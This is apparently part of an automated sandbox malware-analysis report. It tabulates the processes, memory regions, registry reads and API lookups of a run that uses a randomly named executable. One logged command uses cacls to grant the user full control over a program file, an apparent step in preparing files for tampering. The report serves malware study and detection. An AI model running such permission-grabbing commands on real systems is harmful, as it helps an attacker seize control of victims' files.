| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "Genko_1.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:24, Reason: Child Process |
| Unmonitor | End Time: 00:04:28, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x688 |
| Parent PID | 0xa40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
790
0x
EF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000008e0000 | 0x008e0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x008effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x008f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x00901fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x00903fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x00923fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x0096ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000970000 | 0x00970000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00a73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x00a80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00aa0000 | 0x00b5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e10000 | 0x00e10000 | 0x00f0ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00f10000 | 0x01246fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f9a0000 | 0x7f9a0000 | 0x7fa9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007faa0000 | 0x7faa0000 | 0x7fac2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fac8000 | 0x7fac8000 | 0x7facafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007facb000 | 0x7facb000 | 0x7facbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007facc000 | 0x7facc000 | 0x7facefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007facf000 | 0x7facf000 | 0x7facffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 14, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0x204, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #91: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #91 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:26, Reason: Child Process |
| Unmonitor | End Time: 00:04:37, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x370 |
| Parent PID | 0xeac (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
218
0x
5E8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000b50000 | 0x00b50000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x00b5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c20000 | 0x00c20000 | 0x00c23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00c30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00c41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00c50000 | 0x00d0dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d4ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00d50000 | 0x00d51fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004dc0000 | 0x04dc0000 | 0x04f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x04f1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05150000 | 0x05486fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f530000 | 0x7f530000 | 0x7f62ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f630000 | 0x7f630000 | 0x7f652fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f655000 | 0x7f655000 | 0x7f657fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f658000 | 0x7f658000 | 0x7f658fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f65b000 | 0x7f65b000 | 0x7f65bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f65d000 | 0x7f65d000 | 0x7f65ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #92: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #92 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "Genko_1.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:26, Reason: Child Process |
| Unmonitor | End Time: 00:04:28, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x204 |
| Parent PID | 0x688 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E48
0x
75C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001e0000 | 0x0029dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x01e5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01f7ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74380000 | 0x74411fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
